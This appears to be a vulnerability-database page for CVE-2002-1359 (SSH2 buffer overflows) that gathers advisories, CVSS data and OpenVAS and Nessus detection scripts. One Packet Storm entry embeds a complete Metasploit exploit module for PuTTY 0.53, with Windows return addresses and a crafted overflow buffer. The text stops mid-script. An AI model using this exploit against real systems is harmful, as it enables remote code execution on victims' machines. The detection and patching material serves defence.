Multiple SSH2 servers and clients do not properly handle large packets or large fields, which may allow remote attackers to cause a denial of service or possibly execute arbitrary code via buffer overflow attacks, as demonstrated by the SSHredder SSH protocol test suite.
{"checkpoint_advisories": [{"lastseen": "2021-12-17T12:12:40", "description": "A buffer overflow vulnerability has been reported in multiple SSH2 servers and clients. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {}, "published": "2014-01-07T00:00:00", "type": "checkpoint_advisories", "title": "Multiple SSH2 Products Response Buffer Overflow - Ver2 (CVE-2002-1359)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2002-1359"], "modified": "2014-01-07T00:00:00", "id": "CPAI-2014-0066", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-04T19:41:50", "description": "A buffer overflow vulnerability has been reported in multiple SSH2 servers and clients. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {}, "published": "2014-02-03T00:00:00", "type": "checkpoint_advisories", "title": "Multiple SSH2 Products Response Buffer Overflow - Ver2 (CVE-2002-1359)", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2002-1359"], "modified": "2022-07-04T00:00:00", "id": "CPAI-2014-0813", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}], "packetstorm": [{"lastseen": "2016-12-05T22:13:47", "description": "", "cvss3": {}, "published": "2009-11-26T00:00:00", "type": "packetstorm", "title": "PuTTy.exe <= v0.53 Buffer Overflow", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2002-1359"], "modified": "2009-11-26T00:00:00", "id": "PACKETSTORM:83008", "href": "https://packetstormsecurity.com/files/83008/PuTTy.exe-v0.53-Buffer-Overflow.html", "sourceData": "`## \n# $Id$ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \n \n \nclass Metasploit3 < Msf::Exploit::Remote \n \ninclude Msf::Exploit::Remote::TcpServer \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'PuTTy.exe <= v0.53 Buffer Overflow', \n'Description' => %q{ \nThis module exploits a buffer overflow in the PuTTY SSH client that is triggered \nthrough a validation error in SSH.c. \n}, \n'Author' => 'MC', \n'License' => MSF_LICENSE, \n'Version' => '$Revision$', \n'References' => \n[ \n[ 'CVE', '2002-1359' ], \n[ 'OSVDB', '8044'], \n[ 'URL', 'http://www.rapid7.com/advisories/R7-0009.html' ], \n[ 'BID', '6407'], \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'process', \n}, \n'Payload' => \n{ \n'Space' => 400, \n'BadChars' => \"\\x00\", \n'MaxNops' => 0, \n'StackAdjustment' => -3500, \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'Windows 2000 SP4 English', { 'Ret' => 0x77e14c29 } ], \n[ 'Windows XP SP2 English', { 'Ret' => 0x76b43ae0 } ], \n[ 'Windows 2003 SP1 English', { 'Ret' => 0x76aa679b } ], \n], \n'Privileged' => false, \n'DisclosureDate' => 'December 16 2002', \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptPort.new('SRVPORT', [ true, \"The SSH daemon port to listen on\", 22 ]) \n], self.class) \nend \n \ndef on_client_connect(client) \nreturn if ((p = regenerate_payload(client)) == nil) \n \nbuffer = \n\"SSH-2.0-OpenSSH_3.6.1p2\\r\\n\" + \n\"\\x00\\x00\\x4e\\xec\\x01\\x14\" + \n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" + \n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x07\\xde\" + \n(((((rand_text_alphanumeric(64)) + \",\") * 30) + rand_text_alphanumeric(64) + \"\\x00\\x00\\x07\\xde\") * 2) + \n(((rand_text_alphanumeric(64)) + \",\") * 2) + rand_text_alphanumeric(21) + \n[target.ret].pack('V') + make_nops(10) + p.encoded + \n(((rand_text_alphanumeric(64)) + \",\") * 15) + rand_text_alphanumeric(64) + \"\\x00\\x00\\x07\\xde\" + \n(((rand_text_alphanumeric(64)) + \",\") * 30) + rand_text_alphanumeric(64) + \"\\x00\\x00\\x07\\xde\" + \n(((rand_text_alphanumeric(64)) + \",\") * 21) + rand_text_alphanumeric(64) + \"\\x00\\x00\\x07\\xde\" + \n(((((rand_text_alphanumeric(64)) + \",\") * 30) + rand_text_alphanumeric(64) + \"\\x00\\x00\\x07\\xde\") * 6) + \n\"\\x00\\x00\\x00\\x00\\x00\\x00\" \n \nprint_status(\"Sending #{buffer.length} bytes to #{client.getpeername}:#{client.peerport}...\") \n \nclient.put(buffer) \nhandler \n \nservice.close_client(client) \nend \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/83008/putty_msg_debug.rb.txt", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "debiancve": [{"lastseen": "2022-07-04T06:01:21", "description": "Multiple SSH2 servers and clients do not properly handle large packets or large fields, which may allow remote attackers to cause a denial of service or possibly execute arbitrary code via buffer overflow attacks, as demonstrated by the SSHredder SSH protocol test suite.", "cvss3": {}, "published": "2002-12-23T05:00:00", "type": "debiancve", "title": "CVE-2002-1359", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2002-1359"], "modified": "2002-12-23T05:00:00", "id": "DEBIANCVE:CVE-2002-1359", "href": "https://security-tracker.debian.org/tracker/CVE-2002-1359", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2017-07-02T21:10:05", "description": "According to its banner, the remote SSH server is vulnerable to one or \n more of the following vulnerabilities:\n\nCVE-2002-1357 (incorrect length)\nCVE-2002-1358 (lists with empty elements/empty strings)\nCVE-2002-1359 (large packets and large fields)\nCVE-2002-1360 (string fields with zeros)\n\nSome of these vulnerabilities may allow remote attackers to execute \narbitrary code with the privileges of the SSH process, usually root.", "cvss3": {}, "published": "2005-11-03T00:00:00", "type": "openvas", "title": "SSH Multiple Vulns", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2002-1359", "CVE-2002-1358", "CVE-2002-1357", "CVE-2002-1360"], "modified": "2017-05-01T00:00:00", "id": "OPENVAS:11195", "href": "http://plugins.openvas.org/nasl.php?oid=11195", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: ssh_multivulns_16122002.nasl 6053 2017-05-01 09:02:51Z teissa $\n# Description: SSH Multiple Vulns\n#\n# Authors:\n# Paul Johnston of Westpoint Ltd <paul@westpoint.ltd.uk>\n#\n# Copyright:\n# Copyright (C) 2002 Paul Johnston, Westpoint Ltd\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ntag_summary = \"According to its banner, the remote SSH server is vulnerable to one or \n more of the following vulnerabilities:\n\nCVE-2002-1357 (incorrect length)\nCVE-2002-1358 (lists with empty elements/empty strings)\nCVE-2002-1359 (large packets and large fields)\nCVE-2002-1360 (string fields with zeros)\n\nSome of these vulnerabilities may allow remote attackers to execute \narbitrary code with the privileges of the SSH process, usually root.\";\n\ntag_solution = \"Upgrade your SSH server to an unaffected version\";\n\nif(description)\n{\n script_id(11195);\n script_version(\"$Revision: 6053 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-05-01 11:02:51 +0200 (Mon, 01 May 2017) $\");\n script_tag(name:\"creation_date\", value:\"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2002-1357\", \"CVE-2002-1358\", \"CVE-2002-1359\", \"CVE-2002-1360\");\n\n name = \"SSH Multiple Vulns\";\n script_name(name);\n\n\n summary = \"SSH Multiple Vulnerabilities 16/12/2002\";\n\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"qod_type\", value:\"remote_banner\"); \n script_copyright(\"This script is Copyright (C) 2002 Paul Johnston, Westpoint Ltd\");\n script_family(\"Gain a shell remotely\");\n script_require_ports(\"Services/ssh\", 22);\n script_dependencies(\"ssh_detect.nasl\");\n\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\nport = get_kb_item(\"Services/ssh\");\nif (!port) port = 22;\n\nbanner = get_kb_item(\"SSH/banner/\" + port);\nif ( ! banner ) exit(0);\n\n\n#\n# SSH-2.0-3.2.0 F-Secure SSH Windows NT Server\n# versions up to 3.1.* affected\n#\nif(ereg(pattern:\"^SSH-2.0-([12]\\..*|3\\.[01]\\..*) F-Secure SSH\", string:banner, icase:TRUE))\n{ \n security_message(port);\n}\n\n#\n# SSH-2.0-3.2.0 SSH Secure Shell Windows NT Server\n# versions up to 3.1.* affected\n#\nif(ereg(pattern:\"^SSH-2.0-([12]\\..*|3\\.[01]\\..*) SSH Secure Shell\", string:banner, icase:TRUE))\n{ \n security_message(port);\n}\n\n#\n# SSH-1.99-Pragma SecureShell 3.0\n# versions up to 2.* affected\n#\nif(ereg(pattern:\"^SSH-1.99-Pragma SecureShell ([12]\\..*)\", string:banner, icase:TRUE))\n{ \n security_message(port);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-03-30T16:38:07", "description": "According to its banner, the remote SSH server is vulnerable to one or\n more of the following vulnerabilities:\n\n CVE-2002-1357 (incorrect length)\n\n CVE-2002-1358 (lists with empty elements/empty strings)\n\n CVE-2002-1359 (large packets and large fields)\n\n CVE-2002-1360 (string fields with zeros)", "cvss3": {}, "published": "2005-11-03T00:00:00", "type": "openvas", "title": "SSH Multiple Vulns", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2002-1359", "CVE-2002-1358", "CVE-2002-1357", "CVE-2002-1360"], "modified": "2020-03-26T00:00:00", "id": "OPENVAS:136141256231011195", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231011195", "sourceData": "# OpenVAS Vulnerability Test\n# Description: SSH Multiple Vulns\n#\n# Authors:\n# Paul Johnston of Westpoint Ltd <paul@westpoint.ltd.uk>\n#\n# Copyright:\n# Copyright (C) 2002 Paul Johnston, Westpoint Ltd\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.11195\");\n script_version(\"2020-03-26T13:48:10+0000\");\n script_tag(name:\"last_modification\", value:\"2020-03-26 13:48:10 +0000 (Thu, 26 Mar 2020)\");\n script_tag(name:\"creation_date\", value:\"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2002-1357\", \"CVE-2002-1358\", \"CVE-2002-1359\", \"CVE-2002-1360\");\n script_name(\"SSH Multiple Vulns\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_copyright(\"Copyright (C) 2002 Paul Johnston, Westpoint Ltd\");\n script_family(\"Gain a shell remotely\");\n script_dependencies(\"ssh_detect.nasl\");\n script_require_ports(\"Services/ssh\", 22);\n script_mandatory_keys(\"ssh/server_banner/available\");\n\n script_tag(name:\"solution\", value:\"Upgrade your SSH server to an unaffected version.\");\n\n script_tag(name:\"summary\", value:\"According to its banner, the remote SSH server is vulnerable to one or\n more of the following vulnerabilities:\n\n CVE-2002-1357 (incorrect length)\n\n CVE-2002-1358 (lists with empty elements/empty strings)\n\n CVE-2002-1359 (large packets and large fields)\n\n CVE-2002-1360 (string fields with zeros)\");\n\n script_tag(name:\"impact\", value:\"Some of these vulnerabilities may allow remote attackers to execute\n arbitrary code with the privileges of the SSH process, usually root.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"ssh_func.inc\");\ninclude(\"misc_func.inc\");\n\nport = ssh_get_port(default:22);\nbanner = ssh_get_serverbanner(port:port);\nif ( ! banner )\n exit(0);\n\n# SSH-2.0-3.2.0 F-Secure SSH Windows NT Server\n# versions up to 3.1.* affected\nif(ereg(pattern:\"^SSH-2.0-([12]\\..*|3\\.[01]\\..*) F-Secure SSH\", string:banner, icase:TRUE))\n{\n security_message(port:port);\n}\n\n# SSH-2.0-3.2.0 SSH Secure Shell Windows NT Server\n# versions up to 3.1.* affected\nif(ereg(pattern:\"^SSH-2.0-([12]\\..*|3\\.[01]\\..*) SSH Secure Shell\", string:banner, icase:TRUE))\n{\n security_message(port:port);\n}\n\n# SSH-1.99-Pragma SecureShell 3.0\n# versions up to 2.* affected\nif(ereg(pattern:\"^SSH-1.99-Pragma SecureShell ([12]\\..*)\", string:banner, icase:TRUE))\n{\n security_message(port:port);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-08-19T13:19:16", "description": "The remote SSH server is vulnerable to various vulnerabilities that may allow an attacker to obtain a root shell on this host.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2004-08-20T00:00:00", "type": "nessus", "title": "SSH Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2002-1357", "CVE-2002-1358", "CVE-2002-1359", "CVE-2002-1360"], "modified": "2019-03-06T00:00:00", "cpe": [], "id": "1973.PRM", "href": "https://www.tenable.com/plugins/nnm/1973", "sourceData": "Binary data 1973.prm", "cvss": {"score": 10, "vector": "CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T13:19:33", "description": "The remote SSH server (or client) is vulnerable to various vulnerabilities that may allow an attacker to obtain a root shell on this host.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2004-08-20T00:00:00", "type": "nessus", "title": "SSH Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2002-1357", "CVE-2002-1358", "CVE-2002-1359", "CVE-2002-1360"], "modified": "2019-03-06T00:00:00", "cpe": [], "id": "1974.PRM", "href": "https://www.tenable.com/plugins/nnm/1974", "sourceData": "Binary data 1974.prm", "cvss": {"score": 10, "vector": "CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T13:20:36", "description": "It is possible to make the remote IOS crash when sending it malformed SSH packets during the key exchange.\n\nThese flaws are documented as CISCO bug ID CSCdz60229, CSCdy87221 and CSCdu75477.", "cvss3": {"score": null, "vector": null}, "published": "2003-03-14T00:00:00", "type": "nessus", "title": "Cisco SSH2 Server/Client Malformed Packet Remote DoS (CSCdz60229, CSCdy87221, CSCdu75477)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2002-1357", "CVE-2002-1358", "CVE-2002-1359", "CVE-2002-1360"], "modified": "2018-06-27T00:00:00", "cpe": ["cpe:/o:cisco:ios"], "id": "CSCDZ60229.NASL", "href": "https://www.tenable.com/plugins/nessus/11383", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif(description)\n{\n script_id(11383);\n script_version(\"1.29\");\n script_cve_id(\"CVE-2002-1357\", \"CVE-2002-1358\", \"CVE-2002-1359\", \"CVE-2002-1360\");\n script_bugtraq_id(6397, 6405, 6407, 6408, 6410);\n\n script_name(english:\"Cisco SSH2 Server/Client Malformed Packet Remote DoS (CSCdz60229, CSCdy87221, CSCdu75477)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is missing a vendor-supplied security patch.\" );\n script_set_attribute(attribute:\"description\", value:\n\"It is possible to make the remote IOS crash when sending\nit malformed SSH packets during the key exchange.\n\nThese flaws are documented as CISCO bug ID CSCdz60229, CSCdy87221 and \nCSCdu75477.\" );\n script_set_attribute(attribute:\"solution\", value:\n\"See \nhttp://www.nessus.org/u?aed52b80\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'PuTTY Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(20, 119);\n\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2003/03/14\");\n script_cvs_date(\"Date: 2018/06/27 18:42:25\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2002/12/16\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value: \"cpe:/o:cisco:ios\");\n script_end_attributes();\n\n script_summary(english:\"Uses SNMP to determine if a flaw is present\");\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is (C) 2003-2018 Tenable Network Security, Inc.\");\n script_family(english:\"CISCO\");\n script_dependencie(\"snmp_sysDesc.nasl\", \"snmp_cisco_type.nasl\");\n script_require_keys(\"SNMP/community\", \"SNMP/sysDesc\", \"CISCO/model\");\n exit(0);\n}\n\n# The code starts here\n\nok=0;\nos = get_kb_item(\"SNMP/sysDesc\"); if(!os)exit(0);\nhardware = get_kb_item(\"CISCO/model\"); if(!hardware)exit(0);\n\n# Check for the required operating system...\n#----------------------------------------------------------------\n# Is this IOS ?\nif(!egrep(pattern:\".*(Internetwork Operating|IOS).*\", string:os))exit(0);\n# 12.0S\nif(egrep(string:os, pattern:\"((12\\.0\\(([0-9]|[1-1][0-9]|2[0-2])\\)|12\\.0)S[0-9]*|12\\.0\\(23\\)S[0-1]),\"))ok=1;\n\n# 12.0ST\nif(egrep(string:os, pattern:\"((12\\.0\\(([0-9]|[1-1][0-9]|2[0-0])\\)|12\\.0)ST[0-9]*|12\\.0\\(21\\)ST[0-5]),\"))ok=1;\n\n# 12.1E\nif(egrep(string:os, pattern:\"((12\\.1\\(([0-9]|1[0-3])\\)|12\\.1)E[0-9]*|12\\.1\\(14\\)E[0-0]),\"))ok=1;\n\n# 12.1EA\nif(egrep(string:os, pattern:\"(12\\.1\\(([0-9]|1[0-2])\\)|12\\.1)EA[0-9]*,\"))ok=1;\n\n# 12.1T\nif(egrep(string:os, pattern:\"(12\\.1\\([0-9]*\\)|12\\.1)T[0-9]*,\"))ok=1;\n\n# 12.2\nif(egrep(string:os, pattern:\"(12\\.2\\(([0-9]|1[0-2])\\)|12\\.2),\"))ok=1;\n\n# 12.2S\nif(egrep(string:os, pattern:\"(12\\.2\\(([0-9]|1[0-3])\\)|12\\.2)S[0-9]*,\"))ok=1;\n\n# 12.2T\nif(egrep(string:os, pattern:\"((12\\.2\\(([0-9]|1[0-2])\\)|12\\.2)T[0-9]*|12\\.2\\(13\\)T[0-0]),\"))ok=1;\n\n\n#----------------------------------------------\n\nif(ok)security_hole(port:161, proto:\"udp\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T13:19:28", "description": "The remote SSH server (or client) is vulnerable to various vulnerabilities that may allow an attacker to obtain a root shell on this host.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2004-08-20T00:00:00", "type": "nessus", "title": "SSH Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2002-1357", "CVE-2002-1358", "CVE-2002-1359", "CVE-2002-1360"], "modified": "2019-03-06T00:00:00", "cpe": [], "id": "1975.PRM", "href": "https://www.tenable.com/plugins/nnm/1975", "sourceData": "Binary data 1975.prm", "cvss": {"score": 10, "vector": "CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-16T02:37:47", "description": "Certain Cisco products containing support for the Secure Shell (SSH) server are vulnerable to a Denial of Service (DoS) if the SSH server is enabled on the device. A malformed SSH packet directed at the affected device can cause a reload of the device. No authentication is necessary for the packet to be received by the affected device. The SSH server in Cisco IOS is disabled by default.\n\nCisco will be making free software available to correct the problem as soon as possible.\n\nThe malformed packets can be generated using the SSHredder test suite from Rapid7, Inc. Workarounds are available. The Cisco PSIRT is not aware of any malicious exploitation of this vulnerability.", "cvss3": {"score": null, "vector": null}, "published": "2010-09-01T00:00:00", "type": "nessus", "title": "SSH Malformed Packet Vulnerabilities - Cisco Systems", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2002-1357", "CVE-2002-1358", "CVE-2002-1359", "CVE-2002-1360"], "modified": "2018-11-15T00:00:00", "cpe": ["cpe:/o:cisco:ios"], "id": "CISCO-SA-20021219-SSH-PACKETHTTP.NASL", "href": "https://www.tenable.com/plugins/nessus/48968", "sourceData": "#TRUSTED 908c731acc3263aa69b15d28b0d7ecbc7c3afaf25920b459edab4e15e6145545426db6d2cf7f754853e70c6e7f8bb9158281b3051884217db4f11256fb2015ce33f79b6c55ec6479a5384270cfd2f5c891d76c06a1f72d098d7351531e3459159183f52d76b31c7ad773050b51fce1486aa236b90e4f40bcc7dee5a0f510d8702a443ef27d3d6690d9c7cbdca9d966cbe2476b049eb7128916f7892783e789f5a1542eb2a532b4b073e00ece5c9154c6f59e34d2390a80c31d616a421348f29510ccd85f569b1dc1a25e7ab2e4bd86e8007e2db977166465c731b3c51922e36e38306fbc54cd94afd40665183cefab2fe51cfcf88d01e07532f4da9a658adf06cef38f6e9f2fa3c7c80efe7fb1c0b64e0b0ce714b6e5e38bf78975e073cdbf77cc7897fb4936ccbc4df342154fd27ad1345932c6e8fb401b7d7a3e1a06737b67a9dccfd3d0784b6dc1dd5e97de8cb3bcf302b6d44a561548215e91b47a9f4261798076a92461e95e27e454dded667e3fda27438d71ce06cd746b859509ed6d0adf1941804e8cd3cdca087c00eb3fb002a61baea7e551c5e967650fee7d948d61bf331dbf6ff774d298b61385da65953b70f4753cd70c43510fdcca5b00384c1e8d9f555b07f99afd0cbad4e6ef2dc6d1dbb7f4945abb23968df6f6c216999898a8b217a057c43a33b40243fa304998c5ad73079e1a3da4f370aa40e57ddffa0e\n#\n# (C) Tenable Network Security, Inc.\n#\n# Security advisory is (C) CISCO, Inc.\n# See https://www.cisco.com/en/US/products/products_security_advisory09186a008011c3b4.shtml\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(48968);\n script_version(\"1.20\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2018/11/15\");\n\n script_cve_id(\"CVE-2002-1357\", \"CVE-2002-1358\", \"CVE-2002-1359\", \"CVE-2002-1360\");\n script_bugtraq_id(6405, 6407, 6408, 6410);\n script_xref(name:\"CERT-CC\", value:\"389665\");\n script_xref(name:\"CERT-CC\", value:\"CA-2002-36\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCdu75477\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCdy87221\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCdz07673\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCdz60229\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCdz62330\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCdz66748\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCeb16775\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCed38362\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-20021219-ssh-packet\");\n\n script_name(english:\"SSH Malformed Packet Vulnerabilities - Cisco Systems\");\n script_summary(english:\"Checks IOS version\");\n\n script_set_attribute(attribute:\"synopsis\", value:\"The remote device is missing a vendor-supplied security patch.\");\n script_set_attribute(attribute:\"description\", value:\n\"Certain Cisco products containing support for the Secure Shell (SSH)\nserver are vulnerable to a Denial of Service (DoS) if the SSH server is\nenabled on the device. A malformed SSH packet directed at the affected\ndevice can cause a reload of the device. No authentication is necessary\nfor the packet to be received by the affected device. The SSH server in\nCisco IOS is disabled by default.\n\nCisco will be making free software available to correct the problem as\nsoon as possible.\n\nThe malformed packets can be generated using the SSHredder test suite\nfrom Rapid7, Inc. Workarounds are available. The Cisco PSIRT is not\naware of any malicious exploitation of this vulnerability.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.rapid7.com/security-center/advisories/R7-0009.jsp\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20021219-ssh-packet\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?cc3e11cf\");\n # https://www.cisco.com/en/US/products/products_security_advisory09186a008011c3b4.shtml\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4184156c\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the relevant patch referenced in Cisco Security Advisory\ncisco-sa-20021219-ssh-packet\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'PuTTY Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(20);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2002/12/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2002/12/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/09/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:cisco:ios\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is (C) 2010-2018 Tenable Network Security, Inc.\");\n script_family(english:\"CISCO\");\n\n script_dependencie(\"cisco_ios_version.nasl\");\n script_require_keys(\"Host/Cisco/IOS/Version\");\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"cisco_func.inc\");\ninclude(\"cisco_kb_cmd_func.inc\");\n\nflag = 0;\nreport_extra = \"\";\nversion = get_kb_item_or_exit(\"Host/Cisco/IOS/Version\");\noverride = 0;\n\n# Affected: 12.0S\nif (check_release(version: version,\n patched: make_list(\"12.0(21)S6\", \"12.0(22)S4\", \"12.0(23)S2\"),\n oldest: \"12.0(5)S\")) {\n report_extra = '\\nUpdate to ' + patch_update + ' or later\\n'; flag++;\n}\n# Affected: 12.0ST\nif (check_release(version: version,\n patched: make_list(\"12.0(20)ST7\", \"12.0(21)ST6\"),\n oldest: \"12.0(16)ST\")) {\n report_extra = '\\nUpdate to ' + patch_update + ' or later\\n'; flag++;\n}\n# Affected: 12.1E\nif (check_release(version: version,\n patched: make_list(\"12.1(13)E3\", \"12.1(14)E1\"),\n oldest: \"12.1(5a)E\")) {\n report_extra = '\\nUpdate to ' + patch_update + ' or later\\n'; flag++;\n}\n# Affected: 12.1EA\nif (check_release(version: version,\n patched: make_list(\"12.1(13)EA1\") )) {\n report_extra = '\\nUpdate to ' + patch_update + ' or later\\n'; flag++;\n}\n# Affected: 12.1T\nif (deprecated_version(version, \"12.1T\")) {\n report_extra = '\\nNo fix is available for 12.1T releases. Upgrade to a supported version\\n'; flag++;\n}\n# 